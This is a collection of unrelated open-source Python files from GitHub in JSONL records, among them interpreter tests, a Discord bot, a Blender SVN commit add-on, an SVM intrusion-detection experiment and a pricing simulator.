(stock_dat.shape[1], stock_dat.shape[2])\n\n\tmodel = generate_model(input_frame_shape)\n\ttrain_model(model, train_x, train_y, val_x, val_y)\n\n\teval_model(stock_ticker, model, test_x, test_y, display=True)","repo_name":"Jeffreychen99/20XX_Trader","sub_path":"model_tf.py","file_name":"model_tf.py","file_ext":"py","file_size_in_byte":4172,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"18598551680","text":"import io\nfrom unittest import TestCase, mock\nfrom brd_package_misaelaguayo.Brd import Brd\n\n\nclass Tests(TestCase):\n def setUp(self):\n self.brd = Brd()\n\n @mock.patch(\"sys.stdout\", new_callable=io.StringIO)\n def assert_stdout(self, n, expected_output, mock_stdout):\n self.brd.runFile(n)\n self.assertEqual(mock_stdout.getvalue(), expected_output)\n\n def test_block_scope(self):\n self.assert_stdout(\n \"examples/block_scope.brd\",\n \"inner a\\nouter b\\nglobal c\\nouter a\\nouter b\\nglobal c\\nglobal a\\nglobal b\\nglobal c\\n\",\n )\n\n def test_printing(self):\n self.assert_stdout(\n \"examples/printing.brd\",\n \"one\\ntrue\\n3\\n\",\n )\n\n def test_variable_assignment(self):\n self.assert_stdout(\n \"examples/variable_assignment.brd\",\n \"2\\n\",\n )\n\n def test_variables(self):\n 
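# Added note (grounded in the expected output below): runs examples/variables.brd through the interpreter and asserts it prints 3\n        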
self.assert_stdout(\n \"examples/variables.brd\",\n \"3\\n\",\n )\n\n def test_while_stmt(self):\n self.assert_stdout(\n \"examples/while_stmt.brd\",\n \"nil\\n1\\n2\\n3\\n4\\n5\\n6\\n7\\n8\\n9\\n\",\n )\n\n def test_for_stmt(self):\n self.assert_stdout(\n \"examples/for_loop.brd\",\n \"nil\\n1\\n1\\n2\\n3\\n5\\n8\\n13\\n21\\n34\\n55\\n89\\n144\\n233\\n377\\n610\\n987\\n1597\\n2584\\n4181\\n6765\\n\",\n )\n","repo_name":"misaelaguayo/BRD","sub_path":"tests/tests.py","file_name":"tests.py","file_ext":"py","file_size_in_byte":1365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"1387256490","text":"from typing import List\n\nclass Solution:\n def partition(self, s: str) -> List[List[str]]:\n \"\"\"Recursive DFS backtracking.\"\"\"\n answer = []\n\n def dfs(so_far: List[str], incoming: str, remaining: str):\n # If incoming is not palindrome, exit\n if incoming != incoming[-1::-1]:\n return\n # Add new palindromic substring to \"so far\"\n new_so_far = [*so_far, incoming]\n len_remaining = len(remaining)\n # If no strings remain, all substrings are palindromes\n if len_remaining == 0:\n answer.append(new_so_far)\n return\n # Create partitions for remaining part of string.\n for partition in range(1, len_remaining + 1):\n front = remaining[:partition]\n back = remaining[partition:]\n dfs(new_so_far, front, back)\n\n # Top level: split string and perform DFS from there\n for partition in range(1, len(s)+1):\n front = s[:partition]\n back = s[partition:]\n dfs([], front, back)\n\n return answer\n","repo_name":"ArchTangent-study/leetcode","sub_path":"backtracking/palindrome_partitioning/131_palindrome_partitioning_1.py","file_name":"131_palindrome_partitioning_1.py","file_ext":"py","file_size_in_byte":1138,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"34286029120","text":"from discord.ext import commands\nimport discord\nimport utils.shakespeare as shks\n\nclass TextGenerator(commands.Cog):\n \"\"\"Create random texts based on the chosen artist\"\"\"\n \n def __init__(self, bot):\n self.bot = bot\n\n @commands.command(name=\"nome\")\n async def shakespeare_name(self, ctx, arg):\n loop = True\n pedro = \"\"\n try:\n while loop:\n pedro = shks.generate_until_dot_temperature_pedro(f'{arg.upper()}')\n if pedro != \"\":\n loop = False\n em = discord.Embed(color=0x80CEE1)\n em.add_field(\n name=f\"**Nome shakespeariano gerado pela rede:**\",\n value=f'{pedro[:-1]}',\n inline=False\n )\n await ctx.send(embed = em)\n except:\n await ctx.send('Lembre-se de não usar caractéres ausentes nos textos originais de Shakespeare, tais quais acentos e \"ç\".')\n\n @commands.command(name=\"frase\")\n async def shakespeare_phrase(self, ctx, *args):\n message = ' '.join(args) \n try:\n phrase = shks.generate_until_dot_temperature(message)\n em = discord.Embed(color=0x80CEE1)\n em.add_field(\n name=f\"**Frase shakespeariana gerada pela rede:**\",\n value=f'{phrase}',\n inline=False\n )\n await ctx.send(embed = em)\n except:\n await ctx.send('Lembre-se de não usar caractéres ausentes nos textos originais de Shakespeare, tais quais acentos e \"ç\".') \n\nasync def setup(bot):\n await bot.add_cog(TextGenerator(bot))\n","repo_name":"petcomputacaoufrgs/bot-do-pet-old","sub_path":"commands/text-generator.py","file_name":"text-generator.py","file_ext":"py","file_size_in_byte":1641,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} 
+{"seq_id":"13913467523","text":"#!/usr/bin/env python\n# coding: utf-8\n#\n# author: Tim Wang\n# date: May, 2014\n# filename: yamlutil.py\n\nimport yaml\n\n\ndef store2yaml(data, ymlfile, coding='utf-8'):\n yaml.safe_dump(data, open(ymlfile, 'wt'),\n indent=4, \n allow_unicode=True,\n encoding=coding,\n )","repo_name":"tim-spac/common_lib","sub_path":"utl/yamlutil.py","file_name":"yamlutil.py","file_ext":"py","file_size_in_byte":290,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"39499386377","text":"import queue\r\nfrom threading import Thread\r\nimport tkinter as tk\r\nfrom time import sleep\r\n\r\n\r\nclass Counter(tk.Tk):\r\n def __init__(self, queue, font=\"Courier\", size=1000, foreground=\"green\"):\r\n super().__init__()\r\n self.attributes('-fullscreen', True)\r\n self.queue = queue\r\n self.data = self.queue.get()\r\n self.font = font\r\n self.size = size\r\n self.foreground = foreground\r\n self.l = tk.Label(self, text=self.data)\r\n self.l.config(font=(self.font, self.size), fg=self.foreground)\r\n self.l.pack()\r\n \r\n def getNumber(self):\r\n self.data = self.queue.get()\r\n print(self.data)\r\n self.l.configure(text=self.data)\r\n self.l.after(500, self.getNumber)\r\n \r\n \r\nclass ThreadCounter(Thread):\r\n def __init__(self, queue):\r\n super().__init__()\r\n self.queue = queue\r\n\r\n def run(self):\r\n self.root = Counter(self.queue) # create my tkinter object\r\n self.root.after(500, self.root.getNumber) # Find value in the main thread\r\n self.root.mainloop()\r\n \r\nq = queue.Queue()\r\ncnt = 0\r\nq.put(cnt)\r\nthreadCounter = ThreadCounter(q)\r\nthreadCounter.start()\r\nwhile True:\r\n sleep(2)\r\n cnt += 1\r\n q.put(cnt)","repo_name":"Hyderman/Counter","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1262,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"69893455610","text":"import os\r\nimport time\r\nsteps = input(\"How many steps? 
\")\r\n\r\nnumber = int(steps) \r\ntop = (\"__\")\r\ndown = number\r\n\r\nprint(top) \r\nfor num in range(1,number):\r\n \r\n kun = \"%s|_\" % (' ' * num *2)\r\n print(kun)\r\n time.sleep(0.08)\r\n \r\nprint((down *(\"__\")) + \"|\")\r\n\r\n\r\n\r\n\r\n\r\n\r\n \r\n\r\n\r\n\r\n\r\n \r\n \r\n \r\n \r\n\r\n\r\n\r\n\r\n\r\n\r\n ","repo_name":"TomasBalbinder/Projekty","sub_path":"schody.py","file_name":"schody.py","file_ext":"py","file_size_in_byte":358,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"11858823929","text":"import numpy as np\nimport reservoir as res\nimport toolbox as tb\nimport sys\n\n\ntransient = 1000 # first transient iterations won't be recorded\nskip = 0\n\nsize = 160\nscale = 16\nlength = 10000000\n\nmax_init = 100\n\ntake = int(sys.argv[1])\n\nnp.random.seed(take)\nrndweight = tb.rndWeights(size) # first command to use rnd to keep track\nmaxAbsEigVal = tb.findMaxAbsEigVal(rndweight)\nweight = (scale * rndweight) / maxAbsEigVal\n\nfile = open(\"./data/output/160-16-9/\" + str(take) + \".txt\", \"w+\")\n\nnp.random.seed(100101)\nfor initid in range(max_init):\n print(\"take:\", take, \"initid:\", initid)\n state = tb.unitState(size) * 0.5\n\n r = res.Reservoir(size, weight, state)\n r.run(transient, mode=\"transient\")\n r.run(length, mode=\"extract\", skip=skip)\n\n ostr = \"\".join(r.output)\n file.write(ostr)\n\nfile.close()\n","repo_name":"alkim-akgun/A-Pseudo-Random-Number-Generator-based-on-the-Chaotic-Reservoir-of-an-Echo-State-Network--BSc-Thesis","sub_path":"scripts/generate.py","file_name":"generate.py","file_ext":"py","file_size_in_byte":813,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"25698701769","text":"import sys, pygame, random\nfrom ww import *\npygame.init()\n\nww=Stage(20, 20, 24)\nww.set_player(KeyboardPlayer(\"icons/face-cool-24.png\", ww))\nww.add_actor(Wall(\"icons/wall.jpg\", ww, 3, 4))\nww.add_actor(Wall(\"icons/wall.jpg\", ww, 4, 4))\nww.add_actor(Wall(\"icons/wall.jpg\", ww, 5, 4))\nww.add_actor(Wall(\"icons/wall.jpg\", ww, 7, 9))\nww.add_actor(Wall(\"icons/wall.jpg\", ww, 8, 9))\nww.add_actor(Wall(\"icons/wall.jpg\", ww, 9, 9))\nww.add_actor(Wall(\"icons/wall.jpg\", ww, 9, 10))\nww.add_actor(Wall(\"icons/wall.jpg\", ww, 9, 11))\nww.add_actor(Wall(\"icons/wall.jpg\", ww, 15, 15))\nww.add_actor(Wall(\"icons/wall.jpg\", ww, 15, 16))\nww.add_actor(Wall(\"icons/wall.jpg\", ww, 15, 17))\nww.add_actor(Wall(\"icons/wall.jpg\", ww, 15, 18))\nww.add_actor(Monster(\"icons/face-devil-grin-24.png\", ww, 0, 3, 1))\nww.add_actor(Monster(\"icons/face-devil-grin-24.png\", ww, 7, 4, 5))\nww.add_actor(Monster(\"icons/face-devil-grin-24.png\", ww, 4, 10, 3))\nww.add_actor(Monster(\"icons/face-devil-grin-24.png\", ww, 5, 20, 2))\n\n# YOUR COMMENT GOES HERE. BRIEFLY DESCRIBE WHAT THE FOLLOWING LOOP DOES.\n# This while loop is for adding random number of boxes into the stage.\n'''\n\n'''\nnum_boxes=0\nwhile num_boxes<100:\n x=random.randrange(ww.get_width())\n y=random.randrange(ww.get_height())\n if ww.get_actor(x,y) is None:\n ww.add_actor(Box(\"icons/emblem-package-2-24.png\", ww, x, y))\n num_boxes+=1\n\nnum_sticky = 0\nwhile num_sticky < 5:\n x=random.randrange(ww.get_width())\n y=random.randrange(ww.get_height())\n if ww.get_actor(x,y) is None:\n ww.add_actor(StickyBox(\"icons/sticky_box.png\", ww, x, y))\n num_sticky += 1\n\n\n \n# YOUR COMMENT GOES HERE. 
BRIEFLY DESCRIBE WHAT THE FOLLOWING LOOP DOES.\n# This while loop runs the game: every 100 milliseconds it processes quit/keyboard events, then advances and redraws the stage.\nwhile True:\n    pygame.time.wait(100)\n    for event in pygame.event.get():\n        if event.type == pygame.QUIT:\n            pygame.quit()\n            sys.exit(0)\n        if event.type == pygame.KEYDOWN:\n            ww.player_event(event.key)\n    ww.step()\n    ww.draw()\n","repo_name":"xxcocoymlxx/Study-Notes","sub_path":"CSC108/a3/wwgame.py","file_name":"wwgame.py","file_ext":"py","file_size_in_byte":2059,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"77"} +{"seq_id":"11912311888","text":"# Many students attended class today. All but a single student were present.\n# Given an array with every student's name and an array of the students who attended, return the name of the student who was absent.\n\n\nall_students = [\"나연\", \"정연\", \"모모\", \"사나\", \"지효\", \"미나\", \"다현\", \"채영\", \"쯔위\"]\npresent_students = [\"정연\", \"모모\", \"채영\", \"쯔위\", \"사나\", \"나연\", \"미나\", \"다현\"]\n\n\ndef get_absent_student(all_array, present_array):\n    dict = {}\n    for key in all_array:\n        dict[key] = True  # only the keys matter here, so any value will do\n\n    for key in present_array:  # remove each attending student's key from dict\n        del dict[key]\n\n    for key in dict.keys():\n        return key  # only one student is left, so return the first remaining key directly\n\n\nprint(get_absent_student(all_students, present_students))","repo_name":"NayoungBae/algorithm","sub_path":"week_3/11_get_absent_student.py","file_name":"11_get_absent_student.py","file_ext":"py","file_size_in_byte":964,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"40200680188","text":"\"This file defines the relevant geometric models Forward & inverse Kinematics and Dynamics \"\n\n# in the following\nimport numpy as np\nfrom numpy import linalg as LA\nimport math\n\nclass Quaternion:\n\n    def creat_quaternion(self,w,vector):#create quaternion\n        x, y, z = vector\n        return np.array([w,x,y,z])\n\n    def rotation_in_quaternion(self,angle,rotation_axis):\n        #A rotation about the unit vector n^ by an angle, computed using the quaternion \n\n        rotation_axis=rotation_axis/LA.norm(rotation_axis) #normalize in case rotation_axis is not unit length\n        qw=math.cos(0.5*angle)\n        q =math.sin(0.5*angle)*rotation_axis\n        qx=q[0]\n        qy=q[1]\n        qz=q[2]\n        return np.array([qw,qx,qy,qz]) #keep the [w,x,y,z] ordering used by the other methods\n\n    def quaternion_conjugate(self,quaternion):#q*\n        w, x, y, z = quaternion\n        return np.array([w,-x,-y,-z])\n\n    def quaternion_inverse(self,quaternion):#q^-1\n        return self.quaternion_conjugate(quaternion)/(math.pow(LA.norm(quaternion),2))\n\n    def quaternion_multiply(self,quaternion1, quaternion0):#q1*q2\n        w0, x0, y0, z0 = quaternion0\n        w1, x1, y1, z1 = quaternion1\n\n        return np.array([-x1 * x0 - y1 * y0 - z1 * z0 + w1 * w0,\n                         x1 * w0 + y1 * z0 - z1 * y0 + w1 * x0,\n                         -x1 * z0 + y1 * w0 + z1 * x0 + w1 * y0,\n                         x1 * y0 - y1 * x0 + z1 * w0 + w1 * z0], dtype=np.float64)\n\n    def quaternion_2_rotation_matrix(self,quaternion):\n        #q (1x4) -> R (3x3)\n\n        # Extract the values from quaternion\n        q0, q1, q2, q3 = quaternion\n        \n        # First row of the rotation matrix\n        r00 = 2 * (q0 * q0 + q1 * q1) - 1\n        r01 = 2 * (q1 * q2 - q0 * q3)\n        r02 = 2 * (q1 * q3 + q0 * q2)\n        \n        # Second row of the rotation matrix\n        r10 = 2 * (q1 * q2 + q0 * q3)\n        r11 = 2 * (q0 * q0 + q2 * q2) - 1\n        r12 = 2 * (q2 * q3 - q0 * q1)\n        \n        # Third row of the rotation matrix\n        r20 = 2 * (q1 * q3 - q0 * q2)\n        r21 = 2 * (q2 * q3 + q0 * q1)\n        r22 = 2 * (q0 * q0 + q3 * q3) - 1\n        \n        # 3x3 rotation matrix\n        rot_matrix = np.array([[r00, r01, r02],\n                           [r10, r11, r12],\n                           [r20, r21, r22]])\n        \n        return rot_matrix\n\n    def 
quaternion_update(self,old_quaternion,rotation_in_quaternion):\n        #q(t+1)=q(t)*rotation_in_quaternion\n        return self.quaternion_multiply(old_quaternion,rotation_in_quaternion)\n\n    def vec_rotation_update(self,vector,rotation_quaternion):\n        #return the rotated vector \n        vec_in_quaternion=self.creat_quaternion(0,np.array([vector[0],vector[1],vector[2]]))\n        rotation_quaternion_inverse=self.quaternion_inverse(rotation_quaternion)\n        rotation_vec_in_quaternion=self.quaternion_multiply(self.quaternion_multiply(rotation_quaternion,vec_in_quaternion),rotation_quaternion_inverse)\n        w, vec_new_x, vec_new_y, vec_new_z = rotation_vec_in_quaternion\n        return np.array([vec_new_x, vec_new_y, vec_new_z])\n","repo_name":"Lior-Falach/Steps","sub_path":"robot_interface/scripts/Quaternion.py","file_name":"Quaternion.py","file_ext":"py","file_size_in_byte":3054,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"77"} +{"seq_id":"37437151677","text":"import random\nprint(\"\\n---------------Hey user Welcome to the game Rock Paper Scissors!!---------------\")\nprint(\"---------------0 : ROCK--------------- \\n---------------1 : PAPER--------------- \\n---------------2 : SCISSORS---------------\\n\")\nnum=int(input(\"Hey,- Pick 1 to start the Game \\n     - pick 0 to exit game :\"))\ngame={0:\"stone\",1:\"paper\",2:\"scissors\"}\nguss=random.randrange(0,3)\nk=1\ncounter1=0\ncounter2=0\ntotal_game=0\nif num==1:\n    while(k<=20):\n        num = int(input(\"Pick a number from the given Box :\"))\n        if (num <= 2):\n            total_game+=1\n            guss=random.randrange(0,3)  # let the computer pick a fresh move every round\n            print(\"you selected\", game[num])\n            print(\"Computer selected\", game[guss])\n            if num==0:\n                if game[guss]==game[1]:\n                    print(\"You got 0 point \\n\")\n                    counter1+=1\n                elif game[guss]==game[num]:\n                    print(\"Try again...!\")\n                else:\n                    print(\"You got 1 Point\")\n                    counter2 += 1\n            elif num==1:\n                if game[guss]==game[2]:\n                    print(\"You got 0 point\")\n                    counter1 += 1\n                elif game[guss]==game[num]:\n                    print(\"Try again...!\")\n                else:\n                    print(\"You got 1 Point\")\n                    counter2 += 1\n            else:\n                if game[guss]==game[0]:\n                    print(\"You got 0 point\")\n                    counter1 += 1\n                elif game[guss]==game[num]:\n                    print(\"Try again...!\")\n                else:\n                    print(\"You got 1 Point\")\n                    counter2 += 1\n        else:\n            break\n            # print(\"Hey Select any values from 0-2!\")\n            # num = int(input(\"Hey,Pick the next number from the given Box :\"))\n        k+=1\n    print(\"Game ended!!\")\n    if counter1>counter2:\n        print(\"Opzz!you failed...!!!! 
\\n---------------Points---------------\\n Computer got\",counter1,\"points.\\n Number of games you have played\",total_game,\"\\n You got\",counter2,\"points.\" )\n    elif counter1<counter2:\n        print(\"Congrats!you won...!!!! \\n---------------Points---------------\\n Computer got\",counter1,\"points.\\n Number of games you have played\",total_game,\"\\n You got\",counter2,\"points.\" )\n    else:\n        print(\"Game Tied...!!!!\")","program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"} +{"text":"    @classmethod\n    def get_committable_files(cls, context) -> List[SVN_file]:\n        \"\"\"Return the list of file entries whose status allows committing\"\"\"\n        svn_file_list = context.scene.svn.external_files\n        committable_statuses = ['modified', 'added', 'deleted']\n        files_to_commit = [f for f in svn_file_list if f.status in committable_statuses]\n        return files_to_commit\n\n    @classmethod\n    def poll(cls, context):\n        if SVN_COMMIT_THREAD:\n            # Don't allow starting a new commit if the previous one isn't finished yet.\n            return False\n        return cls.get_committable_files(context)\n\n    def draw(self, context):\n        \"\"\"Draws the boolean toggle list with a list of strings for the button texts.\"\"\"\n        layout = self.layout\n        files = self.get_committable_files(context)\n        layout.label(text=\"These files will be pushed to the remote repository:\")\n        svn = context.scene.svn\n        row = layout.row()\n        row.label(text=\"Filename\")\n        row.label(text=\"Status\")\n        for idx, file in enumerate(files):\n            row = layout.row()\n            row.prop(self, \"selection\", index=idx, text=file.name)\n            text = file.status_name\n            icon = file.status_icon\n            if file == svn.current_blend_file and bpy.data.is_dirty:\n                text += \" but not saved!\"\n                icon = 'ERROR'\n                row.alert = True\n            row.label(text=text, icon=icon)\n\n        row = layout.row()\n        row.label(text=\"Commit message:\")\n        self.last_idx = 0\n        for i in range(type(self).MAX_LINES):\n            if getattr(self, f'commit_message_{i}') != \"\":\n                self.last_idx = min(i+1, self.MAX_LINES)\n        for i in range(0, max(3, self.last_idx+2)):\n            # Draw input boxes until the last one that has text, plus two, minimum three.\n            # Why two after the last line? Because then you can use Tab to go to the next line.\n            # Why at least 3 lines? Because then you can write a one-liner without\n            # the OK button jumping away.\n            layout.prop(self, f'commit_message_{i}', text=\"\")\n            continue\n\n    def execute(self, context: bpy.types.Context) -> Set[str]:\n        committable_files = self.get_committable_files(context)\n        files_to_commit = [f for i, f in enumerate(committable_files) if self.selection[i]]\n\n        if not files_to_commit:\n            self.report({'ERROR'}, \"No files were selected, nothing to commit.\")\n            return {'CANCELLED'}\n\n        if len(self.commit_message_0) < 2:\n            self.report({'ERROR'}, \"Please describe your changes in the commit message.\")\n            return {'CANCELLED'}\n\n        commit_message_lines = [getattr(self, f'commit_message_{i}') for i in range(self.last_idx)]\n        commit_message = \"\\n\".join(commit_message_lines)\n\n        filepaths = [f.svn_path for f in files_to_commit]\n\n        global SVN_COMMIT_MSG\n        global SVN_COMMIT_FILELIST\n        SVN_COMMIT_MSG = commit_message\n        SVN_COMMIT_FILELIST = filepaths\n\n        self.set_predicted_file_statuses(context, filepaths)\n        svn_commit_background_start()\n\n        report = f\"{(len(files_to_commit))} files\"\n        if len(files_to_commit) == 1:\n            report = files_to_commit[0].svn_path\n        self.report({'INFO'}, f\"Started committing {report}. 
See console for when it's finished.\")\n\n return {\"FINISHED\"}\n\n def set_predicted_file_statuses(self, context, filepaths):\n for filepath in filepaths:\n f = context.scene.svn.get_file_by_svn_path(filepath)\n if f.status != 'deleted':\n if f.repos_status == 'none':\n f.status = 'normal'\n else:\n f.status = 'conflicted'\n f.status_predicted_flag = \"COMMIT\"\n\n\ndef async_svn_commit():\n \"\"\"This function should be executed from a separate thread to avoid freezing \n Blender's UI during execute_svn_command().\n \"\"\"\n global SVN_COMMIT_OUTPUT\n global SVN_COMMIT_MSG\n global SVN_COMMIT_FILELIST\n SVN_COMMIT_OUTPUT = \"\"\n filepaths = \" \".join(SVN_COMMIT_FILELIST)\n\n context = bpy.context\n SVN_COMMIT_OUTPUT = execute_svn_command(context, f'svn commit -m \"{SVN_COMMIT_MSG}\" {filepaths}', use_cred=True)\n if type(SVN_COMMIT_OUTPUT) == subprocess.CalledProcessError:\n print(\"Committing failed, try again.\")\n print(SVN_COMMIT_OUTPUT.stderr.decode())\n SVN_COMMIT_OUTPUT = \"\"\n svn_commit_background_stop()\n SVN_COMMIT_MSG = \"\"\n SVN_COMMIT_FILELIST = []\n\n\ndef timer_svn_commit():\n global SVN_COMMIT_OUTPUT\n global SVN_COMMIT_THREAD\n context = bpy.context\n\n if SVN_COMMIT_THREAD and SVN_COMMIT_THREAD.is_alive():\n # Process is still running, so we just gotta wait. Let's try again in 1s.\n return 1.0\n elif SVN_COMMIT_OUTPUT:\n print(SVN_COMMIT_OUTPUT)\n svn_commit_background_stop()\n for f in context.scene.svn.external_files:\n if f.status_predicted_flag == 'COMMIT':\n f.status_predicted_flag = 'SINGLE'\n SVN_COMMIT_OUTPUT = \"\"\n SVN_COMMIT_THREAD = None\n svn_log_background_fetch_start()\n return\n\n SVN_COMMIT_THREAD = threading.Thread(target=async_svn_commit, args=())\n SVN_COMMIT_THREAD.start()\n\n return 1.0\n\n\ndef svn_commit_background_start(_dummy1=None, _dummy2=None):\n if not bpy.app.timers.is_registered(timer_svn_commit):\n bpy.app.timers.register(timer_svn_commit, persistent=True)\n\n\ndef svn_commit_background_stop(_dummy1=None, _dummy2=None):\n if bpy.app.timers.is_registered(timer_svn_commit):\n bpy.app.timers.unregister(timer_svn_commit)\n global SVN_COMMIT_THREAD\n SVN_COMMIT_THREAD = None\n\nregistry = [\n SVN_commit\n]\n","repo_name":"Moykul/blender-studio-tools","sub_path":"blender-svn/blender_svn/svn_commit.py","file_name":"svn_commit.py","file_ext":"py","file_size_in_byte":6925,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"77"} +{"seq_id":"15491868055","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Apr 28 23:48:32 2017\n\n@author: farhan\n\"\"\"\n\nimport numpy as np\nimport pandas as pd\ndata=pd.read_csv(\"training.csv\",header=0,index_col=0)\ndata=data.replace(np.nan,'',regex=True)\nseed=np.loadtxt(\"development-sets-seeds.gz\")\nseeds=seed.reshape(seed.shape[1],seed.shape[0])\ndel seed\ndata=data.as_matrix()\nfrom sklearn.svm import SVC\nfrom sklearn.model_selection import cross_val_score\nfrom sklearn.metrics import roc_auc_score as auc_s\nimport pickle\n#for seed in seeds:\nauc_scores=np.zeros(5)\nk=0\nfor seed in seeds:\n X_train=data[seed==0,:-1]\n Y_train=data[seed==0,-1]\n X_test=data[seed==1,:-1]\n Y_test=data[seed==1,-1]\n vect=pickle.loads(dict_vect)\n X_tr0,X_ts0=vect.transform(X_train[:,0]),vect.transform(X_test[:,0])\n X_tr1,X_ts1=vect.transform(X_train[:,1]),vect.transform(X_test[:,1])\n X_tr=np.concatenate((X_tr0.toarray(),X_tr1.toarray()),axis=1)\n X_ts=np.concatenate((X_ts0.toarray(),X_ts1.toarray()),axis=1)\n Y_tr,Y_ts=np.zeros(len(Y_train)), 
np.zeros(len(Y_test))\n    Y_tr[Y_train==\"Normal\"]=1\n    Y_ts[Y_test==\"Normal\"]=1\n    clf=SVC(kernel='rbf',C=1,probability=True)\n    scores=cross_val_score(clf,X_tr,Y_tr,cv=5, scoring='f1_macro')\n    print(scores)\n    clf.fit(X_tr,Y_tr)\n    y_pred=clf.predict_proba(X_ts)\n    auc_scores[k]=auc_s(Y_ts,y_pred[:,1])\n    k+=1\n    print(auc_scores)\n    ","repo_name":"data-boss/net-int-det","sub_path":"svm_binary.py","file_name":"svm_binary.py","file_ext":"py","file_size_in_byte":1449,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"77"} +{"seq_id":"86662512254","text":"import sys\nimport os\nimport subprocess\n\ntry:\n    from PySide2.QtCore import *\nexcept ImportError:\n    from PyQt5.QtCore import *\nif 'PyQt5' in sys.modules:\n    from PyQt5.QtCore import pyqtSignal as Signal, pyqtSlot as Slot\nelse:\n    from PySide2.QtCore import Signal, Slot\n\n\ncm4 = subprocess.getoutput(\"cat /proc/cpuinfo | grep 'Revision' | awk '{print $1,$2,$3}'\")\nbuild = subprocess.getoutput('cat /proc/device-tree/hardware')\nrpios = subprocess.getoutput('lsb_release -ds')\nlinux = subprocess.getoutput('uname -r')\neth = os.popen('ip addr show eth0 | grep \"\\\\<inet\\\\>\" | awk \\'{ print $2 }\\' | awk -F \"/\" \\'{ print $1 }\\'').read().strip()\nwifi = os.popen('ip addr show wlan0 | grep \"\\\\<inet\\\\>\" | awk \\'{ print $2 }\\' | awk -F \"/\" \\'{ print $1 }\\'').read().strip()\n\nif wifi == '':\n    wifi = 'Not connected to WiFi'\nelse:\n    wifi = wifi\n\nif eth == '':\n    eth = 'Not connected to Ethernet'\nelse:\n    eth = eth\n\nclass Systeminfo(QThread):\n    SystemSignal = Signal(str,str,str,str,str,str)\n    def __init__(self):\n        super().__init__()\n        \n    def run(self):\n        Compute = cm4\n        Retermial = build\n        Version = rpios\n        Kernel = linux\n        Ethernet = eth\n        Wifi = wifi\n        self.sleep(1)\n        self.SystemSignal.emit(Compute,Retermial,Version,Kernel,Ethernet,Wifi)","repo_name":"Seeed-Studio/Seeed_Python_ReTerminalQt5Examples","sub_path":"src/SystemInfo.py","file_name":"SystemInfo.py","file_ext":"py","file_size_in_byte":1335,"program_lang":"python","lang":"en","doc_type":"code","stars":29,"dataset":"github-code","pt":"77"} +{"seq_id":"70446123770","text":"import copy\nimport numpy as np\nimport sys\nfrom copy import deepcopy as cdc\nfrom P1_Base.Classes_base import Hyperparameters, Daily_Website\n\n# SIMULATOR WITH:\n# -conversion rates\n# -alpha\n# -no. of purchases\n# -transition prob.\n\n\ndef profit_puller(prices, env: Hyperparameters, n_users_pt, tr_prob) -> float:\n\n    env_daily = Daily_Website(env, cdc(prices))\n    env_daily.n_users = [n_users_pt, n_users_pt, n_users_pt]\n    env_daily.alphas = np.array(env.dir_params, dtype=float)/np.sum(env.dir_params)\n\n    # tran_prob = (MC_daily.transition_prob[0]+MC_daily.transition_prob[1]+MC_daily.transition_prob[2])/3\n    tran_prob = tr_prob\n    alphas = (env_daily.alphas[0] + env_daily.alphas[1] + env_daily.alphas[2]) / 3\n    conv_rate = np.mean(env_daily.conversion_rates, axis=0)\n\n    connectivity = np.zeros(shape=(5, 2), dtype=int)\n    for i in range(5):\n        connectivity[i, :] = np.array(np.where(tran_prob[i, :] > 0))\n\n    pur_prob = np.zeros(5, dtype=float)\n\n    all_prods = np.array([0, 1, 2, 3, 4])\n\n    for p1 in range(5):\n        visited = np.array([p1])\n        to_visit = np.delete(copy.deepcopy(all_prods), visited)\n\n        click_in_chain = np.zeros(5, dtype=float)\n\n        click_in_chain[p1] = conv_rate[p1]\n        prob_per_p1 = np.zeros(5, dtype=float)\n\n        for p2 in np.intersect1d(connectivity[p1], to_visit):\n            visited = np.array([p1, p2])\n            to_visit = 
np.delete(copy.deepcopy(all_prods), visited)\n\n click_in_chain[p2] = conv_rate[p2]*tran_prob[p1, p2]*click_in_chain[p1]*(1-prob_per_p1[p2])\n prob_per_p1[p2] += click_in_chain[p2]\n\n for p3 in np.intersect1d(connectivity[p2], to_visit):\n visited = np.array([p1, p2, p3])\n to_visit = np.delete(copy.deepcopy(all_prods), visited)\n\n click_in_chain[p3] = conv_rate[p3]*tran_prob[p2, p3]*click_in_chain[p2]*(1-prob_per_p1[p3])\n prob_per_p1[p3] += click_in_chain[p3]\n\n for p4 in np.intersect1d(connectivity[p3], to_visit):\n visited = np.array([p1, p2, p3, p4])\n to_visit = np.delete(copy.deepcopy(all_prods), visited)\n\n click_in_chain[p4] = conv_rate[p4]*tran_prob[p3, p4]*click_in_chain[p3]*(1-prob_per_p1[p4])\n prob_per_p1[p4] += click_in_chain[p4]\n\n for p5 in np.intersect1d(connectivity[p4], to_visit):\n\n prob_per_p1[p5] += conv_rate[p5]*tran_prob[p4, p5]*click_in_chain[p4]*(1 - prob_per_p1[p5])\n\n prob_per_p1[p1] = conv_rate[p1]\n pur_prob += prob_per_p1*alphas[p1+1]\n profit = float(np.sum(pur_prob*env_daily.margin*(1.0 + env.mepp)))\n\n return profit\n\n\ndef pull_prices(env: Hyperparameters, conv_rates, alpha, n_buy, trans_prob, n_users_pt=100, print_message=\"Simulating\")\\\n -> np.array:\n conv_rate = cdc(conv_rates)\n tran_prob = 